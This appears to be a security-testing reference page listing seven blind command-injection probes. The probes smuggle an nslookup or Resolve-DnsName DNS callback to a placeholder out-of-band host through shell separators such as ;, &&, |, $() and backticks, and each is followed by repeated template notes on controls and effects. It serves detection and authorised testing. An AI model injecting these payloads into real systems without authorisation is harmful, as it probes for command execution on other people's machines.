Blind Command Injection OAST Probes
Callback-only command separators for a supported shell hypothesis. Callback labels contain case metadata only, never command output, hostnames, usernames, environment values, files, or secrets. Choose one syntax family that matches the observed stack.
Use as a detection primitive
Callback-only command separators for a supported shell hypothesis. Callback labels contain case metadata only, never command output, hostnames, usernames, environment values, files, or secrets. Choose one syntax family that matches the observed stack.
Identify the parser, sink, encoding, and expected non-vulnerable behavior before choosing a sample. Prefer non-destructive markers.
Use one readable case ID plus a random opaque suffix for every request, field, and variant. Keep one unsubmitted ambient-noise token. Put no secrets or target data in labels, paths, or queries. Redact at ingestion, never publish raw callback logs, and clean up controlled records after sufficient proof.
Recorded payloads
Confirm the sink and encoding context before use.
; nslookup cmdi017-semicolon.UNIQUE.oast.example- Expected signal
- Not verified for this generic template. Confirm the exact tool version and expected output in its official documentation before use.
- Negative control
- Define a known-safe or nonexistent target that should produce a meaningfully different result.
- Effect and bounds
- Unknown until flags and target are reviewed. Assume the command sends traffic or changes local state unless the tool documentation proves otherwise.
Confirm the sink and encoding context before use.
&& nslookup cmdi017-and.UNIQUE.oast.example- Expected signal
- Not verified for this generic template. Confirm the exact tool version and expected output in its official documentation before use.
- Negative control
- Define a known-safe or nonexistent target that should produce a meaningfully different result.
- Effect and bounds
- Unknown until flags and target are reviewed. Assume the command sends traffic or changes local state unless the tool documentation proves otherwise.
Confirm the sink and encoding context before use.
| nslookup cmdi017-pipe.UNIQUE.oast.example- Expected signal
- Not verified for this generic template. Confirm the exact tool version and expected output in its official documentation before use.
- Negative control
- Define a known-safe or nonexistent target that should produce a meaningfully different result.
- Effect and bounds
- Unknown until flags and target are reviewed. Assume the command sends traffic or changes local state unless the tool documentation proves otherwise.
Confirm the sink and encoding context before use.
$(nslookup cmdi017-substitution.UNIQUE.oast.example)- Expected signal
- Not verified for this generic template. Confirm the exact tool version and expected output in its official documentation before use.
- Negative control
- Define a known-safe or nonexistent target that should produce a meaningfully different result.
- Effect and bounds
- Unknown until flags and target are reviewed. Assume the command sends traffic or changes local state unless the tool documentation proves otherwise.
Confirm the sink and encoding context before use.
`nslookup cmdi017-backtick.UNIQUE.oast.example`- Expected signal
- Not verified for this generic template. Confirm the exact tool version and expected output in its official documentation before use.
- Negative control
- Define a known-safe or nonexistent target that should produce a meaningfully different result.
- Effect and bounds
- Unknown until flags and target are reviewed. Assume the command sends traffic or changes local state unless the tool documentation proves otherwise.
Confirm the sink and encoding context before use.
& nslookup cmdi017-windows.UNIQUE.oast.example &- Expected signal
- Not verified for this generic template. Confirm the exact tool version and expected output in its official documentation before use.
- Negative control
- Define a known-safe or nonexistent target that should produce a meaningfully different result.
- Effect and bounds
- Unknown until flags and target are reviewed. Assume the command sends traffic or changes local state unless the tool documentation proves otherwise.
Confirm the sink and encoding context before use.
; Resolve-DnsName cmdi017-powershell.UNIQUE.oast.example- Expected signal
- Not verified for this generic template. Confirm the exact tool version and expected output in its official documentation before use.
- Negative control
- Define a known-safe or nonexistent target that should produce a meaningfully different result.
- Effect and bounds
- Unknown until flags and target are reviewed. Assume the command sends traffic or changes local state unless the tool documentation proves otherwise.
Attribution
Version history: normalized permanent page created 2026-08-20.